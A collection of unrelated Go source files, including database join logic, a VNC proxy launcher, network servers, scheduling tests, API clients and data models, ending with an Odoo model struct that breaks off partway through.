// NULL row when going through the left stream (probing phase), matching
// this with the first NULL row would be incorrect.
//
// If we have have the following:
// CREATE TABLE t(x INT); INSERT INTO t(x) VALUES (NULL);
// | x |
// ------
// | NULL |
//
// For the following query:
// SELECT * FROM t AS a FULL OUTER JOIN t AS b USING(x);
//
// We expect:
// | x |
// ------
// | NULL |
// | NULL |
//
// The following examples illustrates the behavior when joining on two
// or more columns, and only one of them contains NULL.
// If we have have the following:
// CREATE TABLE t(x INT, y INT);
// INSERT INTO t(x, y) VALUES (44,51), (NULL,52);
// | x | y |
// ------
// | 44 | 51 |
// | NULL | 52 |
//
// For the following query:
// SELECT * FROM t AS a FULL OUTER JOIN t AS b USING(x, y);
//
// We expect:
// | x | y |
// ------
// | 44 | 51 |
// | NULL | 52 |
// | NULL | 52 |
hasNull := false
for _, c := range h.eqCols[side] {
if row[c].IsNull() {
hasNull = true
break
}
}
// row has no NULLs in its equality columns (or we are considering NULLs to
// be equal), so it might match a row from the other side.
if !hasNull || h.nullEquality {
return row, nil, false, nil
}
if renderedRow, shouldEmit := h.shouldEmitUnmatched(row, side); shouldEmit {
return renderedRow, nil, true, nil
}
// If this point is reached, row had NULLs in its equality columns but
// should not be emitted. Throw it away and get the next row.
}
}
// shouldEmitUnmatched returns whether this row should be emitted if it doesn't
// match. If this is the case, a rendered row ready for emitting is returned as
// well.
func (h *hashJoiner) shouldEmitUnmatched(
row rowenc.EncDatumRow, side joinSide,
) (rowenc.EncDatumRow, bool) {
if !shouldEmitUnmatchedRow(side, h.joinType) {
return nil, false
}
return h.renderUnmatchedRow(row, side), true
}
// execStatsForTrace implements ProcessorBase.ExecStatsForTrace.
func (h *hashJoiner) execStatsForTrace() *execinfrapb.ComponentStats {
lis, ok := getInputStats(h.leftSource)
if !ok {
return nil
}
ris, ok := getInputStats(h.rightSource)
if !ok {
return nil
}
return &execinfrapb.ComponentStats{
Inputs: []execinfrapb.InputStats{lis, ris},
Exec: execinfrapb.ExecStats{
MaxAllocatedMem: optional.MakeUint(uint64(h.MemMonitor.MaximumBytes())),
MaxAllocatedDisk: optional.MakeUint(uint64(h.diskMonitor.MaximumBytes())),
},
Output: h.Out.Stats(),
}
}
// Some types of joins need to mark rows that matched.
func shouldMarkRightSide(joinType descpb.JoinType) bool {
switch joinType {
case descpb.FullOuterJoin, descpb.RightOuterJoin, descpb.RightAntiJoin:
// For right/full outer joins and right anti joins we need to mark the
// rows from the right side in order to iterate through the unmatched
// rows in hjEmittingRightUnmatched state.
return true
case descpb.RightSemiJoin:
// For right semi joins we need to mark the rows in order to track
// whether we have already emitted an output row corresponding to it.
return true
case descpb.IntersectAllJoin, descpb.ExceptAllJoin:
// For set-operation joins we need to mark the rows in order to track
// whether they have already been used for a set operation (our row
// containers don't know how to delete the rows), so we reuse the
// marking infrastructure to simulate "deleted" rows.
return true
default:
return false
}
}
// ChildCount is part of the execinfra.OpNode interface.
func (h *hashJoiner) ChildCount(verbose bool) int {
if _, ok := h.leftSource.(execinfra.OpNode); ok {
if _, ok := h.rightSource.(execinfra.OpNode); ok {
return 2
}
}
return 0
}
// Child is part of the execinfra.OpNode interface.
func (h *hashJoiner) Child(nth int, verbose bool) execinfra.OpNode {
switch nth {
case 0:
if n, ok := h.leftSource.(execinfra.OpNode); ok {
return n
}
panic("left input to hashJoiner is not an execinfra.OpNode")
case 1:
if n, ok := h.rightSource.(execinfra.OpNode); ok {
return n
}
panic("right input to hashJoiner is not an execinfra.OpNode")
default:
panic(errors.AssertionFailedf("invalid index %d", nth))
}
}
|
package main
import "vncproxy/proxy"
import "flag"
import "vncproxy/logger"
import "os"
func main() {
//create default session if required
var tcpPort = flag.String("tcpPort", "", "tcp port")
var wsPort = flag.String("wsPort", "", "websocket port")
var vncPass = flag.String("vncPass", "", "password on incoming vnc connections to the proxy, defaults to no password")
var recordDir = flag.String("recDir", "", "path to save FBS recordings WILL NOT RECORD if not defined.")
var targetVncPort = flag.String("targPort", "", "target vnc server port")
var targetVncHost = flag.String("targHost", "", "target vnc server host")
var targetVncPass = flag.String("targPass", "", "target vnc password")
var logLevel = flag.String("logLevel", "info", "change logging level")
flag.Parse()
logger.SetLogLevel(*logLevel)
if *tcpPort == "" && *wsPort == "" {
logger.Error("no listening port defined")
flag.Usage()
os.Exit(1)
}
if *targetVncPort == "" {
logger.Error("no target vnc server port defined")
flag.Usage()
os.Exit(1)
}
if *vncPass == "" {
logger.Warn("proxy will have no password")
}
if *recordDir == "" {
logger.Warn("FBS recording is turned off")
}
tcpUrl := ""
if *tcpPort != "" {
tcpUrl = ":" + string(*tcpPort)
}
proxy := &proxy.VncProxy{
WsListeningUrl: "http://0.0.0.0:" + string(*wsPort) + "/", // empty = not listening on ws
RecordingDir: *recordDir, //"/Users/amitbet/vncRec", // empty = no recording
TcpListeningUrl: tcpUrl,
ProxyVncPassword: *vncPass, //empty = no auth
SingleSession: &proxy.VncSession{
TargetHostname: *targetVncHost,
TargetPort: *targetVncPort,
TargetPassword: *targetVncPass, //"vncPass",
ID: "dummySession",
Status: proxy.SessionStatusInit,
Type: proxy.SessionTypeRecordingProxy,
}, // to be used when not using sessions
UsingSessions: false, //false = single session - defined in the var above
}
proxy.StartListening()
}
|
package main
import (
"fmt"
"net"
"go_code/restudy/netstudy/netstudy03/common/utils"
"go_code/restudy/netstudy/netstudy03/common/message"
"go_code/restudy/netstudy/netstudy03/server/process"
)
func main() {
listen, err := net.Listen("tcp", ":8888")
if err != nil {
fmt.Println("服务器创建监听失败", err)
return
}
for {
conn, err := listen.Accept()
if err != nil {
fmt.Println("服务器获取客户端连接失败", err)
continue
}
go dial(conn)
}
}
func dial(conn net.Conn) {
var tf *utils.Transfer = &utils.Transfer{
Conn : conn,
Buf : make([]byte, 8192),
}
mes := tf.ReadPkg()
switch mes.MsgType {
case message.LoginMesType:
var up *process.UserProcess = &process.UserProcess{
Conn : conn,
}
up.Login(mes)
}
} |
package server
import (
"net"
"time"
socket "github.com/mohamedmahmoud97/Zuper-UDP/socket"
)
//SR is the algorithm of selective-repeat
func SR(packets []socket.Packet, noChunks int, conn *net.UDPConn, addr *net.UDPAddr, window int, plp float32, AckCheck chan uint32) {
var ackPack = make(map[int]int)
var pckTimer = make(map[int]time.Time)
start := 0
quit := make(chan uint32, window)
//make all the chunks have value 0 as unack
for i := 0; i < noChunks; i++ {
ackPack[i] = 0
}
//send the first packets with the window size
sendWinPack(start, window, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
//loop until all the packets are sent and received their ack
for (start) < noChunks {
// check if time exceeded or we received a new ack packet
pcktseqno, goResend := resendPck(quit, AckCheck)
ackpckt := int(pcktseqno)
if !goResend {
if ackpckt == start {
ackPack[ackpckt] = 2
time.Sleep(1 * time.Millisecond)
start = getNextStart(start, noChunks, ackPack)
if start != -1 {
sendWinPack(start, window, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
}
} else if ackPack[ackpckt] == 1 {
ackPack[ackpckt] = 2
time.Sleep(1 * time.Millisecond)
nextUnSent := getNextStart(ackpckt, noChunks, ackPack)
if nextUnSent < start+4 && nextUnSent != -1 {
sendWinPack(start, 1, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
}
} else if ackPack[ackpckt] == 2 {
}
} else {
if ackPack[ackpckt] != 2 {
ackPack[ackpckt] = 0
sendWinPack(start, 1, packets, conn, addr, noChunks, plp, quit, ackPack, pckTimer)
}
}
}
start = 0
}
|
package main
import (
"fmt"
"io/ioutil"
"log"
"os"
"path"
"path/filepath"
"sync"
"time"
)
func main() {
files, err := ioutil.ReadDir(".")
if err != nil {
log.Fatal(err)
}
wg := sync.WaitGroup{}
for _, file := range files {
wg.Add(1)
go walk(file.Name(), &wg)
}
wg.Wait()
}
func walk(root string, wg *sync.WaitGroup) {
start := time.Now()
err := filepath.Walk(root, found)
if err != nil {
if wd, wderr := os.Getwd(); wderr == nil {
fmt.Printf("error walking the path %q: %v\n", wd, err)
}
}
t := time.Now()
elapsed := t.Sub(start)
fmt.Printf("%s: %d\n", root, elapsed.Milliseconds())
wg.Done()
}
func found(dir string, info os.FileInfo, err error) error {
if err != nil {
fmt.Printf("prevent panic by handling failure accessing a path %q: %v\n", dir, err)
return err
}
if info.IsDir() && info.Name() == ".git" {
fmt.Println(path.Dir(dir))
}
return nil
}
|
package scheduling
import (
"testing"
"github.com/stretchr/testify/assert"
"k8s.io/apimachinery/pkg/api/resource"
"github.com/G-Research/armada/internal/common"
"github.com/G-Research/armada/pkg/api"
)
// 1 cpu per 1 Gb
var scarcity = map[string]float64{"cpu": 1, "memory": 1.0 / (1024 * 1024 * 1024)}
func Test_sliceResources(t *testing.T) {
q1 := &api.Queue{Name: "q1"}
q2 := &api.Queue{Name: "q2"}
q3 := &api.Queue{Name: "q3"}
cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
noResources := common.ComputeResources{}
queuePriorities := map[*api.Queue]QueuePriorityInfo{
q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q3: {Priority: 1, CurrentUsage: noResources}, // queue usage is 0
}
slices := sliceResource(scarcity, queuePriorities, common.ComputeResources{"cpu": resource.MustParse("8")}.AsFloat())
// resulted usage ration should be 4 : 4 : 4
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
assert.Equal(t, slices, map[*api.Queue]common.ComputeResourcesFloat{q1: twoCpu, q2: twoCpu, q3: fourCpu})
}
func Test_sliceResources_highImbalance(t *testing.T) {
q1 := &api.Queue{Name: "q1"}
q2 := &api.Queue{Name: "q2"}
cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("10"), "memory": resource.MustParse("10Gi")}
noResources := common.ComputeResources{}
queuePriorities := map[*api.Queue]QueuePriorityInfo{
q1: {Priority: 1, CurrentUsage: cpuAndMemory},
q2: {Priority: 1, CurrentUsage: noResources},
}
slices := sliceResource(scarcity, queuePriorities, common.ComputeResources{"cpu": resource.MustParse("3")}.AsFloat())
noCpu := common.ComputeResourcesFloat{"cpu": 0.0}
allCpu := common.ComputeResourcesFloat{"cpu": 3.0}
assert.Equal(t, slices, map[*api.Queue]common.ComputeResourcesFloat{q1: noCpu, q2: allCpu})
}
func Test_SliceResourceWithLimits_SchedulingShareMatchesAdjusted_WhenNoQueuesAtLimit(t *testing.T) {
q1 := &api.Queue{Name: "q1"}
q2 := &api.Queue{Name: "q2"}
q3 := &api.Queue{Name: "q3"}
cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
noResources := common.ComputeResources{}
queuePriorities := map[*api.Queue]QueuePriorityInfo{
q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q3: {Priority: 1, CurrentUsage: noResources}, // queue usage is 0
}
resourceToSlice := common.ComputeResources{"cpu": resource.MustParse("8")}.AsFloat()
queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
q1: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
q3: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
}
slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
// resulted usage ration should be 4 : 4 : 4
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
assert.Equal(t, slices[q1].schedulingShare, twoCpu)
assert.Equal(t, slices[q1].adjustedShare, twoCpu)
assert.Equal(t, slices[q2].schedulingShare, twoCpu)
assert.Equal(t, slices[q2].adjustedShare, twoCpu)
assert.Equal(t, slices[q3].schedulingShare, fourCpu)
assert.Equal(t, slices[q3].adjustedShare, fourCpu)
}
func Test_SliceResourceWithLimits_SchedulingShareCorrespondsWithPriority(t *testing.T) {
q1 := &api.Queue{Name: "q1"}
q2 := &api.Queue{Name: "q2"}
cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
queuePriorities := map[*api.Queue]QueuePriorityInfo{
q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
}
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
resourceToSlice := common.ComputeResourcesFloat{"cpu": 8.0}
queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
q1: {remainingSchedulingLimit: twoCpu, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
}
slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
//Both queues have the same priority so should have the same scheduling share
assert.Equal(t, slices[q1].schedulingShare, fourCpu)
assert.Equal(t, slices[q2].schedulingShare, fourCpu)
}
func Test_SliceResourceWithLimits_AdjustedShare(t *testing.T) {
q1 := &api.Queue{Name: "q1"}
q2 := &api.Queue{Name: "q2"}
cpuAndMemory := common.ComputeResources{"cpu": resource.MustParse("1"), "memory": resource.MustParse("1Gi")}
queuePriorities := map[*api.Queue]QueuePriorityInfo{
q1: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
q2: {Priority: 1, CurrentUsage: cpuAndMemory}, // queue usage is 2
}
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
fourCpu := common.ComputeResourcesFloat{"cpu": 4.0}
resourceToSlice := common.ComputeResourcesFloat{"cpu": 8.0}
queueSchedulingInfo := map[*api.Queue]*QueueSchedulingInfo{
q1: {remainingSchedulingLimit: twoCpu, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
q2: {remainingSchedulingLimit: resourceToSlice, schedulingShare: common.ComputeResourcesFloat{}, adjustedShare: common.ComputeResourcesFloat{}},
}
slices := SliceResourceWithLimits(scarcity, queueSchedulingInfo, queuePriorities, resourceToSlice)
//Both queues have the same priority however q1 is limited to 2cpu
assert.Equal(t, slices[q1].adjustedShare, twoCpu)
assert.Equal(t, slices[q2].adjustedShare, fourCpu)
}
func TestQueueSchedulingInfo_UpdateLimits(t *testing.T) {
oneCpu := common.ComputeResourcesFloat{"cpu": 1.0}
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
data := NewQueueSchedulingInfo(twoCpu, twoCpu, twoCpu)
data.UpdateLimits(oneCpu)
assert.Equal(t, data.remainingSchedulingLimit, oneCpu)
assert.Equal(t, data.schedulingShare, oneCpu)
assert.Equal(t, data.adjustedShare, oneCpu)
}
func TestQueueSchedulingInfo_UpdateLimits_AdjustedLowerThanSchedulingShare(t *testing.T) {
fiveCpu := common.ComputeResourcesFloat{"cpu": 5.0}
tenCpu := common.ComputeResourcesFloat{"cpu": 10.0}
data := NewQueueSchedulingInfo(tenCpu, tenCpu, fiveCpu)
data.UpdateLimits(common.ComputeResourcesFloat{"cpu": 1.0})
assert.Equal(t, data.remainingSchedulingLimit, common.ComputeResourcesFloat{"cpu": 9.0})
assert.Equal(t, data.schedulingShare, common.ComputeResourcesFloat{"cpu": 8.0})
assert.Equal(t, data.adjustedShare, common.ComputeResourcesFloat{"cpu": 4.0})
}
func TestQueueSchedulingInfo_UpdateLimits_AdjustedHigherThanSchedulingShare(t *testing.T) {
fiveCpu := common.ComputeResourcesFloat{"cpu": 5.0}
tenCpu := common.ComputeResourcesFloat{"cpu": 10.0}
data := NewQueueSchedulingInfo(tenCpu, fiveCpu, tenCpu)
data.UpdateLimits(common.ComputeResourcesFloat{"cpu": 2.0})
assert.Equal(t, data.remainingSchedulingLimit, common.ComputeResourcesFloat{"cpu": 8.0})
assert.Equal(t, data.schedulingShare, common.ComputeResourcesFloat{"cpu": 4.0})
assert.Equal(t, data.adjustedShare, common.ComputeResourcesFloat{"cpu": 8.0})
}
func TestQueueSchedulingInfo_UpdateLimits_ValuesLimitedAt0(t *testing.T) {
oneCpu := common.ComputeResourcesFloat{"cpu": 1.0}
twoCpu := common.ComputeResourcesFloat{"cpu": 2.0}
data := NewQueueSchedulingInfo(oneCpu, oneCpu, oneCpu)
data.UpdateLimits(twoCpu)
assert.Equal(t, data.remainingSchedulingLimit, common.ComputeResourcesFloat{"cpu": 0.0})
assert.Equal(t, data.schedulingShare, common.ComputeResourcesFloat{"cpu": 0.0})
assert.Equal(t, data.adjustedShare, common.ComputeResourcesFloat{"cpu": 0.0})
}
|
package bsc
import (
commitmenttypes "github.com/bianjieai/tibc-sdk-go/commitment"
tibctypes "github.com/bianjieai/tibc-sdk-go/types"
)
var _ tibctypes.ClientState = (*ClientState)(nil)
func (m ClientState) ClientType() string {
return "008-bsc"
}
func (m ClientState) GetLatestHeight() tibctypes.Height {
return m.Header.Height
}
func (m ClientState) Validate() error {
return m.Header.ValidateBasic()
}
func (m ClientState) GetDelayTime() uint64 {
return uint64(2*len(m.Validators)/3+1) * m.BlockInteval
}
func (m ClientState) GetDelayBlock() uint64 {
return uint64(2*len(m.Validators)/3 + 1)
}
func (m ClientState) GetPrefix() tibctypes.Prefix {
return commitmenttypes.MerklePrefix{}
}
|
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package testshout
import (
"context"
"os"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/log/logconfig"
"github.com/cockroachdb/cockroach/pkg/util/log/severity"
)
// Example_shout_before_log verifies that Shout output emitted after
// the log flags were set, but before the first log message was
// output, properly appears on stderr.
//
// This test needs to occur in its own test package where there is no
// other activity on the log flags, and no other log activity,
// otherwise the test's behavior will break on `make stress`.
func Example_shout_before_log() {
// Set up a configuration where only WARNING or above goes to stderr.
cfg := logconfig.DefaultConfig()
if err := cfg.Validate(nil /* no dir */); err != nil {
panic(err)
}
cfg.Sinks.Stderr.Filter = severity.WARNING
cleanup, err := log.ApplyConfig(cfg)
if err != nil {
panic(err)
}
defer cleanup()
// Redirect stderr to stdout so the reference output checking below
// has something to work with.
origStderr := log.OrigStderr
log.OrigStderr = os.Stdout
defer func() { log.OrigStderr = origStderr }()
log.Shout(context.Background(), severity.INFO, "hello world")
// output:
// *
// * INFO: hello world
// *
}
|
package model
// Rate request
type Rate struct {
User string `json:"user"`
Item string `json:"item"`
Score float64 `json:"score"`
}
// Recommendation response
type Recommendation struct {
Item string `json:"item"`
Score float64 `json:"score"`
}
// Recommendations type
type Recommendations struct {
User string `json:"user"`
Data []Recommendation `json:"data"`
}
// Item user item
type Item struct {
Name string `json:"item"`
Score float64 `json:"score"`
}
// PopularItems response
type PopularItems struct {
Data []Item `json:"data"`
}
// Items list of item
type Items struct {
User string `json:"user"`
Data []Item `json:"data"`
}
// ItemProbability item probability
type ItemProbability struct {
User string `json:"user"`
Item string `json:"item"`
Probability float64 `json:"propability"`
}
// ErrResponse error response
type ErrResponse struct {
Error string `json:"error"`
Code int `json:"code"`
}
|
package dynatrace
import (
"encoding/json"
"fmt"
"github.com/keptn-contrib/dynatrace-service/internal/common"
"time"
)
const sloPath = "/api/v2/slo"
type SLOResult struct {
ID string `json:"id"`
Enabled bool `json:"enabled"`
Name string `json:"name"`
Description string `json:"description"`
EvaluatedPercentage float64 `json:"evaluatedPercentage"`
ErrorBudget float64 `json:"errorBudget"`
Status string `json:"status"`
Error string `json:"error"`
UseRateMetric bool `json:"useRateMetric"`
MetricRate string `json:"metricRate"`
MetricNumerator string `json:"metricNumerator"`
MetricDenominator string `json:"metricDenominator"`
TargetSuccessOLD float64 `json:"targetSuccess"`
TargetWarningOLD float64 `json:"targetWarning"`
Target float64 `json:"target"`
Warning float64 `json:"warning"`
EvaluationType string `json:"evaluationType"`
TimeWindow string `json:"timeWindow"`
Filter string `json:"filter"`
}
type SLOClient struct {
client ClientInterface
}
func NewSLOClient(client ClientInterface) *SLOClient {
return &SLOClient{
client: client,
}
}
// Get calls Dynatrace API to retrieve the values of the Dynatrace SLO for that timeframe
// It returns a SLOResult object on success, an error otherwise
func (c *SLOClient) Get(sloID string, startUnix time.Time, endUnix time.Time) (*SLOResult, error) {
body, err := c.client.Get(
fmt.Sprintf("%s/%s?from=%s&to=%s",
sloPath,
sloID,
common.TimestampToString(startUnix),
common.TimestampToString(endUnix)))
if err != nil {
return nil, err
}
var result SLOResult
err = json.Unmarshal(body, &result)
if err != nil {
return nil, err
}
// for SLO - its also possible that there is an HTTP 200 but there is an error text in the error property!
// Since Sprint 206 the error property is always there - but - will have the value "NONE" in case there is no actual error retrieving the value
if result.Error != "NONE" {
return nil, fmt.Errorf("dynatrace API returned an error: %s", result.Error)
}
return &result, nil
}
|
package arithmetic
import (
"fmt"
)
// mustBeUnique ensures a label is not registered in the functions, variables or aliases.
func mustBeUnique(label string) {
if _, ok := functions[label]; ok {
panic(fmt.Sprintf("%s already defined as function", label))
}
if _, ok := variables[label]; ok {
panic(fmt.Sprintf("%s already defined as variable", label))
}
if _, ok := aliases[label]; ok {
panic(fmt.Sprintf("%s already defined as alias", label))
}
}
// leftError returns the error triggered by an invalid left operand.
func leftError(o fmt.Stringer, v interface{}) error {
return fmt.Errorf("invalid operation: \"%s %v\" must be preceeded by a valid operand or expression", o, v)
}
// leftError returns the error triggered by an invalid right operand.
func rightError(o fmt.Stringer) error {
return fmt.Errorf("invalid operation: \"%s\" must be followed by a valid operand or expression", o)
}
// invalidExpressionError returns the error triggered by an invalid expression.
func invalidExpressionError(o fmt.Stringer, left, right interface{}) error {
return fmt.Errorf("invalid expression %v %s %v", left, o, right)
}
// eq checks if o1 and o2 are equals. It convers types.
func eq(o1, o2 interface{}) bool {
f1, ok1 := ToFloat(o1)
f2, ok2 := ToFloat(o2)
if ok1 && ok2 {
return f1 == f2
}
b1, ok1 := ToBool(o1)
b2, ok1 := ToBool(o2)
if ok1 && ok2 {
return b1 == b2
}
return o1 == o2
}
// eq checks if o1 is greater than o2. It convers types.
func gt(o1, o2 interface{}) (bool, bool) {
f1, ok := ToFloat(o1)
if !ok {
return false, false
}
f2, ok := ToFloat(o2)
if !ok {
return false, false
}
return f1 > f2, true
}
// floatToInt transforms a float to an int if the decimal part of the float is 0.
func floatToInt(o float64) (int, bool) {
i := int(o)
if float64(i) == o {
return i, true
}
return 0, false
}
// ToFloat casts the input into a float. This helper should be used in the custom funcs to
// use both floats and named variables (such as "e")
func ToFloat(val interface{}) (float64, bool) {
switch t := val.(type) {
case float64:
return t, true
case variable:
v, ok := t.value.(float64)
if !ok {
return 0, false
}
return v, true
default:
return 0, false
}
}
// ToBool casts the input into a bool. This helper should be used in the custom funcs to
// use both bools and named variables (such as "true")
func ToBool(val interface{}) (bool, bool) {
switch t := val.(type) {
case bool:
return t, true
case variable:
v, ok := t.value.(bool)
if !ok {
return false, false
}
return v, true
default:
return false, false
}
}
|
package model
import (
"github.com/jinzhu/gorm"
"time"
)
//内容
type Content struct {
Id int `gorm:"PRIMARY_KEY" json:"id" uri:"id"` //标识
CategoryId int `json:"category_id"` //分类标识
Title string `json:"title"` //标题
Body string `json:"body"` //内容
CreatedAt *Time `json:"created_at"` //创建时间
UpdatedAt *Time `json:"updated_at"` //修改时间
DeletedAt *time.Time `json:"deleted_at"` //删除时间
Category Category `json:"category" gorm:"FOREIGNKEY:category_id;ASSOCIATION_FOREIGNKEY:id"` //
}
func (Content) TableName() string {
return "b_content"
}
//查询之后
func (this *Content) AfterFind(scope *gorm.Scope) error {
return nil
}
//创建之前
func (this *Content) BeforeCreate(scope *gorm.Scope) error {
return nil
}
//创建之后
func (this *Content) AfterCreate(scope *gorm.Scope) error {
return nil
}
//更新之前
func (this *Content) BeforeUpdate(scope *gorm.Scope) error {
return nil
}
//更新之后
func (this *Content) AfterUpdate(scope *gorm.Scope) error {
return nil
}
//删除之前
func (this *Content) BeforeDelete(scope *gorm.Scope) error {
return nil
}
//删除之后
func (this *Content) AfterDelete(scope *gorm.Scope) error {
return nil
}
|
package models
type EntitySummary struct {
CatalogItemId string `json:"catalogItemId"`
Name string `json:"name"`
Links map[string]URI `json:"links"`
Id string `json:"id"`
Type string `json:"type"`
}
|
package set_test
import (
//"testing"
"log"
"math/rand"
"os"
"github.com/lleo/go-functional-collections/key"
"github.com/lleo/go-functional-collections/set"
"github.com/lleo/stringutil"
"github.com/pkg/errors"
)
func init() {
log.SetFlags(log.Lshortfile)
var logFileName = "test.log"
var logFile, err = os.Create(logFileName)
if err != nil {
log.Fatal(errors.Wrapf(err, "failed to os.Create(%q)", logFileName))
}
log.SetOutput(logFile)
}
var Inc = stringutil.Lower.Inc
//type StringKey = key.Str
func buildKeys(num int) []key.Hash {
var keys = make([]key.Hash, num)
var keyStr = "a"
for i := 0; i < num; i++ {
keys[i] = key.Str(keyStr)
keyStr = Inc(keyStr)
}
return keys
}
func buildKeysByN(num int, n int) []key.Hash {
var keys = make([]key.Hash, num)
var keyStr = "a"
for i := 0; i < num; i++ {
keys[i] = key.Str(keyStr)
for j := 0; j < n; j++ {
keyStr = Inc(keyStr)
}
}
return keys
}
func buildStrings(num int) []string {
var strs = make([]string, num)
var str = "a"
for i := 0; i < num; i++ {
strs[i] = str
str = Inc(str)
}
return strs
}
func buildKeysFromStrings(strs []string) []key.Hash {
var keys = make([]key.Hash, len(strs))
for i := 0; i < len(strs); i++ {
keys[i] = key.Str(strs[i])
}
return keys
}
func randomizeKeys(keys []key.Hash) []key.Hash {
var randKeys = make([]key.Hash, len(keys))
copy(randKeys, keys)
//randomize keys
//https://en.wikipedia.org/wiki/Fisher–Yates_shuffle#The_modern_algorithm
for i := len(randKeys) - 1; i > 0; i-- {
var j = rand.Intn(i + 1)
randKeys[i], randKeys[j] = randKeys[j], randKeys[i]
}
return randKeys
}
func buildSet(keys []key.Hash) *set.Set {
var m = set.New()
for _, key := range keys {
m = m.Set(key)
}
return m
}
|
package scanner
import (
"crypto/sha256"
"regexp"
"github.com/MagalixCorp/magalix-agent/v2/proto"
"github.com/MagalixTechnologies/uuid-go"
kv1 "k8s.io/api/core/v1"
)
// Entity basic entity structure can be an application, a service or a container
type Entity struct {
ID uuid.UUID
Name string
Kind string
Annotations map[string]string
}
// IdentifyEntity sets the id of an entity
func (entity *Entity) Identify(parent uuid.UUID) error {
var err error
entity.ID, err = IdentifyEntity(entity.Name, parent)
if err != nil {
return err
}
return nil
}
// Application an abstraction layer representing a namespace
type Application struct {
Entity
Services []*Service
LimitRanges []kv1.LimitRange
}
// Service an abstraction layer representing a service
// it can be a deployment, replicaset, statefulset, daemonset,
// job, cronjob or an orphan pod
type Service struct {
Entity
PodRegexp *regexp.Regexp
ReplicasStatus proto.ReplicasStatus
Containers []*Container
}
// Container represents a single container controlled by a service
// if the container belongs to a pod with no controller, an orphaned pod
// service automatically gets created as a parent
type Container struct {
Entity
Image string
Resources *proto.ContainerResourceRequirements `json:"resources"`
LivenessProbe *kv1.Probe
ReadinessProbe *kv1.Probe
}
func IdentifyEntity(target string, parent uuid.UUID) (uuid.UUID, error) {
hash := sha256.Sum256(append(parent.Bytes(), target...))
return uuid.FromBytes(hash[:uuid.Size])
}
|
package models
import (
"testing"
)
func TestLog(t *testing.T) {
Logs().Debug("Testlog debug")
Logs().Info("Testlog Info")
Logs().Warn("Testlog warning...")
Logs().Error("Testlog Error...")
}
|
/**
* Copyright (c) 2018-present, MultiVAC Foundation.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
package mvvm
import (
"math"
"github.com/perlin-network/life/compiler"
)
var (
// mvvmGasPolicy is the gas policy for MVVM.
//
// In default cases, assume that each single step will consume the unit gas fee.
mvvmGasPolicy = &compiler.SimpleGasPolicy{GasPerInstruction: 1}
// mvvmDefaultGasLimit is the default gas limit for MVVM.
//
// Mostly, it is assumed that the developer will give a user-defined gas limit. But if the limit is not assigned,
// mvvmDefaultGasLimit will be used as the limit value.
// For now the value is set as 65535. Deeper discussion is needed.
// Note that mvvmDefaultGasLimit > 0. 'cause if mvvmDefaultGasLimit <= 0, gas fee will never exceed.
mvvmDefaultGasLimit int64 = 1<<16 - 1
// mvvmMaxGasLimit is the maximum gas limit for MVVM.
//
// The MTV Coin value cost for gas is a big.Int, which is sometimes much bigger than the gas limit for life.
// Hence it is assumed that if the coin value is bigger than mvvmDefaultGasLimit, the gas limit is the maximum limit.
// For now this value is set as the maximum value of int64.
mvvmMaxGasLimit int64 = math.MaxInt64
)
|
package odoo
import (
"fmt"
)
// ImLivechatReportOperator represents im_livechat.report.operator model.
type ImLivechatReportOperator struct {
LastUpdate *Time `xmlrpc:"__last_update,omptempty"`
ChannelId *Many2One `xmlrpc:"channel_id,omptempty"`
DisplayName *String `xmlrpc:"display_name,omptempty"`
Duration *Float `xmlrpc:"duration,omptempty"`
Id *Int `xmlrpc:"id,omptempty"`
LivechatChannelId *Many2One `xmlrpc:"livechat_channel_id,omptempty"`
NbrChannel *Int `xmlrpc:"nbr_channel,omptempty"`
PartnerId *Many2One `xmlrpc:"partner_id,omptempty"`
